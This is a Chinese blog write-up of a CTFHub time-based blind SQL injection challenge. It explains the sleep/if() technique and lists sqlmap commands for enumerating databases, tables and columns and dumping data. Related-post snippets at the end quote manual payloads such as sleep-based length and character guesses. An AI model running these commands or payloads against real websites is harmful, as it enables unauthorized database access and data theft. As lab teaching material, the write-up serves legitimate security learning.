CTFHub的Web的时间盲注

最新推荐文章于 2024-05-06 17:38:12 发布
最新推荐文章于 2024-05-06 17:38:12 发布
阅读量538 收藏 7
点赞数 8
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ndjnddjxn/article/details/137652040
版权
本文介绍了如何使用SQLmap工具进行时间盲注入攻击,包括步骤如查询数据库名、表名、列名和字段信息,同时提醒读者需具备Python环境,以及在不同操作系统上的安装和常用SQLmap命令的使用。
摘要由CSDN通过智能技术生成

1.原理:

时间盲注,一般就是在页面没有任何正确或错误回显的情况下,用时间函数构造时间延后,由回显时间来获取数据,主要是利用sleep函数让sql语句的执行时间变长,常与if(1,2,3)函数连用如果1执行为ture则返回2,否则返回3.

2.过程:

使用sqlmap来做(Windows)

查数据库名

python sqlmap.py -u url/?id=1  --current-db

从以下可以看出:使用时间盲注    Type: time-based blind

查表名

sqlmap -u "url/?id=1”-D sqli --tables

查列名

sqlmap -u "url/?id=1"-D sqli -T flag --columns

查字段信息

sqlmap -u "url/?id=1"-D sqli -T flag -c flag --dump

最后就得到flag了

3.提醒和补充:

   1.sqlmap在Windows和liux中安装都要Python环境,

  在liux中

apt-cache search <软件包名称>(在软件仓库查询某个软件的名称)

apt-cache show <软件包名称>   (查看软件包的相关信息)

apt-get install <软件名称>  (注意在使用此命令之前,要使用 apt-get update,使得当前软件库与相应文件同步,更新或者安装某个软件)

其他,如果我们的软件库中没有相应的软件包,那么我们可以从软件研发的团队的网站上下载
使用他们提供的.deb安装包。(后缀为deb的文件是Debian的安装包文件);如果没有提供软件包,我们可以通过源码来安装。

2.python sqlmap.PY -help  来得到sqlmap中的所以命令

(这是部分内容)

3.常用的sqlmap语句:

整个的单词 需要用两个横杠–,缩写的单词 需要一个横杠-  

python sqlmap/sqlmap.py -u “url/?id=1” –current-user #获取当前用户名称
python sqlmap/sqlmap.py -u “url/?id=1” –current-db #获取当前数据库名称
python sqlmap/sqlmap.py -u“url/?id=1” –tables -D “db_name” #列表名
python sqlmap/sqlmap.py -u “url/?id=1” –columns -T “tablename” users-D “db_name” -v 0 #列字段
python sqlmap/sqlmap.py -u “url/?id=1” –dump -C “column_name” -T “table_name” -D “db_name” -v 0#获取字段内容

ndjnddjxn
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ctfhub web全部做题记录(持续跟新)
01-08
CTF(Capture The Flag)】CTF是一种网络安全竞赛,其中参赛者通过解决各种安全问题来获取“旗标”(代表分数),这些问题通常涉及逆向工程、密码学、Web安全、取证分析等多个领域。 【Web安全】Web安全是网络...
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
时间盲注ctfhub
2401_82985722的博客
03-29 1127
(布尔盲注直接使用length进行筛选:按照length从高到低排序 前面四个即为结果,按照payload1的顺序进行排序得到数据库名sqli。(已经知道长度为4,可以直接设置为4,不知道时 设置比需要爆破字符的长度长。(5)点击开始攻击得到结果,sleep(5)要筛选出响应时间大于5s的数据包。condition为条件,条件为真时返回true,条件为假时返回false。再进行筛选,响应时间最大的四个就是执行成功的——sqli。# -D 指定库,-T指定表,-C 指定列(字段)(爆破字段为26个英文字母)
CTFhub 时间盲注
plant1234的博客
06-17 841
时间盲注: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata sc
2024年最新超硬核,SQL注入之时间盲注,原理+步骤+实战思路,网络安全开发实战
最新发布
2401_84297193的博客
05-06 961
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;条件表达式结果为 False 时,会执行第三个参数位置的代码,即 3,自定义的占位符,无实际意义,页面正常响应。条件表达式结果为 True 时,会执行第二个参数位置的代码,即 sleep(5),延时5秒响应;
CTFHub | 时间盲注
尼泊罗河伯的博客
11-02 1140
根据网页显示内容输入1进行测试,此题可能存在 SQL 注入。此题与前一题类似,同样使用工具 sqlmap 爆出数据库名,查看数据库名中的表发现一个可疑的表名为 flag 。查看 flag 表名的字段为 flag 。检查字段中的数据发现此题 flag 。
CTFHub-web(sql时间盲注)
分享与记录
07-25 3516
文章目录手工注入sqlmap注入使用脚本 手工注入 1. 题目信息 2. 页面3秒钟后才响应,说明数据库名称长度=4 1 and if(length(database())=4,sleep(3),1) 3. 猜解数据库名称 1 and if(ascii(substr(database(),1,1))>110,sleep(3),1) 1 and if(ascii(substr(database(),1,1))=115,sleep(3),1) ascii(s)=115 1 and if(ascii
CTFHUB-SQL注入-时间盲注
u014794539的博客
07-10 424
考点 SQL时间盲注 时间盲注攻击 利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。 分析过程 1 and if(length(database())=5,sleep(3),1) 1 and if(length(database())=4,sleep(3),1) 1 and
3.18号日报,ctfhubweb,文件上传漏洞题目解法
03-18
文件上传漏洞
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境0x00 前言CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。0x01 搭建环境使用CTFhub中的环境的前提条件需要在本地...
CtfHub-wp(web
01-23
本文主要探讨了CTF(Capture The Flag)竞赛中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
CTFHub 技能树之时间盲注
qq_47271638的博客
05-27 998
CTFHub 技能树之时间盲注 首先需要知道时间盲注和布尔盲注一样都是需要大量的时间来整理组合自己所注入的集合 所以本篇主要介绍sqlmap和手工注入联合起来注入 具体步骤: 1.打开环境 判断注入类型 要么此处采用手工判断要么采用sqlmap判断 我们这里采用sqlmap判断 sqlmap初步判断类型为时间盲注 现在就可以自己构造手工注入语句: http://challenge-4e00395e736a4b55.sandbox.ctfhub.com:10080/?id=1 and if(mid(dat
CTFHUB-WEB-SQL注入-时间盲注
weixin_49539962的博客
08-05 358
题目提示是使用时间盲注,并且不会有回显。解题的原理,是通过提交查询语句之后页面的刷新速度判断查询是否正确,如果正确从数据库中查找并返回response耗时比错误的语句稍长一些。但实际操作中受网络波动影响较大,使用sqlmap工具会方便很多。
CTFHub技能树笔记之WEB-SQL:时间盲注
weixin_48799157的博客
04-08 3962
小白一个,如有错误请指正 这里使用两种解法 1.python脚本 2.sqlmap 一、需要用到的函数: length() //返回字符串的长度 ascii() //返回一个字符的ascii码值 substr(字符串,开始位置,截取数量)//截取字符串 sleep() //时间注入的核心函数 if(判断语句,语句一,语句二) ...
CTFHUB-技能树-Web题-SQL注入-时间盲注
Static______的博客
04-03 940
1=1即为真,那么将会执行sleep(3),也就是睡眠3秒钟(默认单位为秒)那既然我们可以构造这个函数,我们就用这个函数来到时间盲注这个靶场尝试一下。得到四个库名,猜测flag最有可能在sqli中,尝试爆破表名来看看。1=1就是我们的条件,sleep(3)为我们的A,1为我们的B。说明即存在时间盲注,我们通过sqlmap可以直接跑出结果。庞大的工作量太过耗时,所以到此为止,开始sqlmap注入。得到表名为flag,news,猜测结果就在flag表中。到这我们已经了解了这个判断语句,那我们可以尝试。
CTFHub SQl注入 时间盲注(sqlmap)
赤城封雪的博客
08-07 5005
CTFHub SQl注入 时间盲注(sqlmap) 0x00 简单介绍 这篇文章主要通过 CTFHub 时间盲注案例简单记录一下 sqlmap 的使用流程。 参考:sqlmap用户手册 | WooYun知识库 (xmd5.com) sqlmap 的功能: 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 (具体过程可见文章末尾案例) sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2
cthub——时间盲注
陈艺秋的博客
01-20 375
sql
CTFHUB SQL注入——时间盲注 附自己写的脚本
wuuconix's blog
08-28 2344
介绍 时间盲注和上一篇布尔盲注一样都是盲注,都需要借助length,ascii,substr这些神奇的函数来猜测各项信息。它们的差别是猜测成功的依据。 布尔盲注的话如果查询有结果,一般会有一个success_flag,比如在上一题里就会返回query successfully。我的脚本也就是request返回值里有没有这个文本来判断是否查询成功的。 但是时间盲注不一样,它不光不给你查询的内容的回显,不给你报错信息,甚至连布尔盲注里的success_flag也不给你。也就是什么情况呢?你在那里查询,它什么信息
ctfhub布尔盲注
08-31
布尔盲注是一种常用于渗透测试中的技术,用于检测和利用应用程序中的漏洞。在CTF比赛中,也经常会涉及到布尔盲注的题目。 布尔盲注是通过构造恶意的输入来判断应用程序是否存在漏洞。它的原理是利用应用程序对输入的处理方式,通过观察应用程序在不同输入情况下的响应,来推断出隐藏在后台数据库中的信息。 在CTFhub中,进行布尔盲注可以通过构造不同的查询语句来判断条件是否成立。以下是一个示例: 假设存在一个登录页面,我们需要猜测正确的用户名和密码。我们可以通过发送恶意输入来检测用户名是否正确。例如,我们可以构造如下的查询语句: `SELECT * FROM users WHERE username = 'admin' AND password LIKE 'a%'` 如果应用程序返回了正常的结果(例如登录成功),那么说明用户名是正确的。否则,我们可以根据返回结果判断用户名是否错误。 通过不断尝试不同的查询语句,我们可以逐步猜测出正确的用户名和密码,从而实现布尔盲注攻击。 需要注意的是,在进行布尔盲注时,需要谨慎处理恶意输入,避免对应用程序造成不必要的风险。同时,合法授权下进行渗透测试是合法的,未经授权的渗透测试则是违法行为。在进行CTF比赛或渗透测试时,请遵守相关法律法规和道德规范。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值